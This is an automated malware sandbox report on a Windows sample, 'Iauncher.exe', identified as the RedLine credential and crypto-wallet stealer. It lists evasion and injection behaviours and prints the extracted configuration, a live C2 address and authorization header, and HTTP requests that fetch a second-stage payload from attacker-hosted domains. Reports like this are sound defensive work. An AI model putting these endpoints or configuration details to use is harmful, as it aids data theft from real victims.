Windows Analysis Report
Iauncher.exe

Overview

General Information

Sample name:Iauncher.exe
Analysis ID:1434866
MD5:e69feb7fd40f408a088d879be323f37a
SHA1:0f71fa75df6795c43c69e7ec5689c995c135079e
SHA256:463dd34a95d86ca5d08059f1ec80d3b00d3bbabdc74936025b7e30ef2b3ee931
Tags:exe
Infos:

Detection

RedLine
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected RedLine Stealer
.NET source code contains potential unpacker
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

  • System is w10x64
  • Iauncher.exe (PID: 6692 cmdline: "C:\Users\user\Desktop\Iauncher.exe" MD5: E69FEB7FD40F408A088D879BE323F37A)
    • Iauncher.exe (PID: 7256 cmdline: "C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exe" MD5: D79977A15EB010C637CF9078B4EB82C8)
      • conhost.exe (PID: 7264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • RegAsm.exe (PID: 7324 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "147.45.47.65:47232", "Bot Id": "\ueb45", "Authorization Header": "a6a58668f69a7e8a13c2ff0e52c1d284"}
Source | Rule | Description | Author | Strings
Iauncher.exe | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
dump.pcap | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |

Source | Rule | Description | Author | Strings
0000000D.00000002.1431945457.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000000B.00000002.1282336889.000000000058E000.00000004.00000001.01000000.0000000D.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
00000000.00000000.1184729227.0000000000592000.00000002.00000001.01000000.00000003.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

Source | Rule | Description | Author | Strings
11.2.Iauncher.exe.590030.1.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.0.Iauncher.exe.590000.0.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
13.2.RegAsm.exe.400000.0.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
11.2.Iauncher.exe.590030.1.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0.2.Iauncher.exe.3ef1a10.6.raw.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
                          No Sigma rule has matched
                          Timestamp:05/01/24-20:35:54.029434
                          SID:2043234
                          Source Port:47232
                          Destination Port:49711
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:35:53.101816
                          SID:2046045
                          Source Port:49711
                          Destination Port:47232
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:36:00.399690
                          SID:2046056
                          Source Port:47232
                          Destination Port:49711
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:05/01/24-20:36:05.641411
                          SID:2043231
                          Source Port:49711
                          Destination Port:47232
                          Protocol:TCP
                          Classtype:A Network Trojan was detected


                          AV Detection

                          Source: 0000000D.00000002.1436621457.0000000002431000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "147.45.47.65:47232", "Bot Id": "\ueb45", "Authorization Header": "a6a58668f69a7e8a13c2ff0e52c1d284"}
                          Source: Iauncher.exeReversingLabs: Detection: 23%
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeJoe Sandbox ML: detected
                          Source: Iauncher.exeJoe Sandbox ML: detected
                          Source: Iauncher.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.7:49699 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.202.98:443 -> 192.168.2.7:49710 version: TLS 1.2
                          Source: Iauncher.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdbBSJB source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp
                          Source: Binary string: costura=costura.costura.dll.compressed=costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressedlB source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmp
                          Source: Binary string: costura.costura.pdb.compressed source: Iauncher.exe
                          Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|6C6000A5EAF8579850AB82A89BD6268776EB51AD|2608 source: Iauncher.exe
                          Source: Binary string: C:\Users\Ilham-PC\Documents\Visual Studio 2015\Projects\Siticone.UI\Build\Release\Siticone.UI.WinForms\Siticone.UI.pdb source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: 11_2_0057960E FindFirstFileExW,11_2_0057960E
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05D6A940
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05DB7908
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05DB78F8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_05DB7A41
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BFEE6Ah0_2_09BFE858
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then inc dword ptr [ebp-10h]0_2_09BFE858
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BF7FE1h0_2_09BF7BA0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_09BF8F3F
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_09BF00E8
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BF279Bh0_2_09BF2550
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09BF279Bh0_2_09BF253F
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CAE48Ah0_2_09CA9CFC
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CAB589h0_2_09CA9C54
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CABCC4h0_2_09CA9C54
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CAC257h0_2_09CA9C54
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CADC32h0_2_09CADAF0
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CABCC4h0_2_09CAB081
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CAE48Ah0_2_09CADC49
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CA158Dh0_2_09CA0040
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea eax, dword ptr [ebp-000000ACh]0_2_09CA0040
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]0_2_09CA0040
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 4x nop then jmp 09CA158Dh0_2_09CA0021

                          Networking

                          Source: TrafficSnort IDS: 2046045 ET TROJAN [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) 192.168.2.7:49711 -> 147.45.47.65:47232
                          Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.7:49711 -> 147.45.47.65:47232
                          Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 147.45.47.65:47232 -> 192.168.2.7:49711
                          Source: TrafficSnort IDS: 2046056 ET TROJAN Redline Stealer/MetaStealer Family Activity (Response) 147.45.47.65:47232 -> 192.168.2.7:49711
                          Source: Malware configuration extractorURLs: 147.45.47.65:47232
                          Source: Yara matchFile source: 0.2.Iauncher.exe.3ef1a10.6.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.Iauncher.exe.5c10000.10.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                          Source: global trafficTCP traffic: 192.168.2.7:49711 -> 147.45.47.65:47232
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/z-Closing.txt HTTP/1.1Host: antiloxss.usite.proConnection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/hwid.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/hwids.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildLink.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /STLprograms/NEW/LM19AR/Gitgo2/BuildZipName.txt HTTP/1.1Host: antiloxss.usite.pro
                          Source: global trafficHTTP traffic detected: GET /Iauncher.zip HTTP/1.1Host: gitgo.orgConnection: Keep-Alive
                          Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
                          Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                          Source: unknownTCP traffic detected without corresponding DNS query: 147.45.47.65
                          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                          Source: Iauncher.exe, 00000000.00000002.3682596392.00000000055B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: CLIENT_VERSIONthttp://gdata.youtube.com/feeds/api/videos/{0}?v=2&alt=jsonDFailed to get youtube video data: Lhttp://vimeo.com/api/v2/video/{0}.json@Failed to get vimeo video data: ork Manager.<br><br> <b>LICENSE MODULE</b><br> The license module enables you to work without interruptions. Issues with the module can be caused by:<br><br> (i) <i>Framework Manager is not installed</i><br>(ii) <i>HDD formatting</i><br>(iii) <i>OS reintallation</i>,<br>(iv) <i>Siticone Files Deletion</i>, or<br>(v) <i>Any other issues</i>.<br><br> For assistance, please contact our support centre at: <i>support@siticoneframework.com</i>PMissing Manager or the Module is corrupt4Download Framework Manager4Contact Our Support CentreHmailto:support@siticoneframework.comDhttps://www.siticoneframework.com/ equals www.youtube.com (Youtube)
                          Source: global trafficDNS traffic detected: DNS query: antiloxss.usite.pro
                          Source: global trafficDNS traffic detected: DNS query: google.com
                          Source: global trafficDNS traffic detected: DNS query: gitgo.org
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antiloxss.usite.pro
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002BB2000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://antiloxss.usite.prod
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: RegAsm.exe, 0000000D.00000002.1436621457.00000000024D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org/Iauncher.zip
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C29000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org/Iauncher.zip&
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002C31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitgo.org/Iauncher.zipd
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/questions/516730/what-does-the-visual-studio-any-cpu-target-mean&
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.digicert.com/CPS0
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3682596392.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3682596392.00000000055B3000.00000004.00000020.00020000.00000000.sdmp, Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.siticoneframework.com/pricing.htmlFSoftware
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                          Source: unknownHTTPS traffic detected: 193.109.246.100:443 -> 192.168.2.7:49699 version: TLS 1.2
                          Source: unknownHTTPS traffic detected: 172.67.202.98:443 -> 192.168.2.7:49710 version: TLS 1.2
                          Source: C:\Users\user\Desktop\Iauncher.exeCode function: 0_2_09BF2390 GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,0_2_09BF2390
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp2498.tmpJump to dropped file
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Temp\Tmp24A8.tmpJump to dropped file
                          Source: C:\Users\user\Desktop\Iauncher.exeProcess Stats: CPU usage > 49%
                          Source: C:\Users\user\AppData\Roaming\Gitgo2\Iauncher.exeCode function: String function: 00566FC0 appears 49 times
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A9B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003A21000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3682430226.0000000005560000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3674975399.0000000000DDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3678508304.0000000003EF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3674975399.0000000000D5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3683105347.0000000005C10000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002ACA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3681933748.0000000005080000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameResourceAssembly.dllD vs Iauncher.exe
                          Source: Iauncher.exe, 00000000.00000002.3676644672.0000000002A11000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSiticone.UI.dll8 vs Iauncher.exe
                          Source: Iauncher.exeBinary or memory string: OriginalFilename vs Iauncher.exe
                          Source: Iauncher.exe, 0000000B.00000002.1282336889.00000000005D3000.00000004.00000001.01000000.0000000D.sdmpBinary or memory string: OriginalFilenameMurkish.exe8 vs Iauncher.exe
                          Source: Iauncher.exeBinary or memory string: OriginalFilenameGitgo.exe" vs Iauncher.exe
                          Source: Iauncher.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                          Source: Iauncher.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: Iauncher.exe.0.drStatic PE information: Section: .bsS ZLIB complexity 0.9981044138707038
                          Source: classification engineClassification label: mal96.troj.spyw.evad.winEXE@6/7@3/4
                          Source: C:\Users\user\Desktop\Iauncher.exeFile created: C:\Users\user\AppData\Roaming\Iauncher.zipJump to behavior
                          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7264:120:WilError_03
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: NULL
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user~1\AppData\Local\Temp\Tmp2498.tmpJump to behavior
                          Source: Iauncher.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process
                          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                          Source: C:\Users\user\Desktop\Iauncher.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                          Source: C:\Users\user\Desktop\Iauncher.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
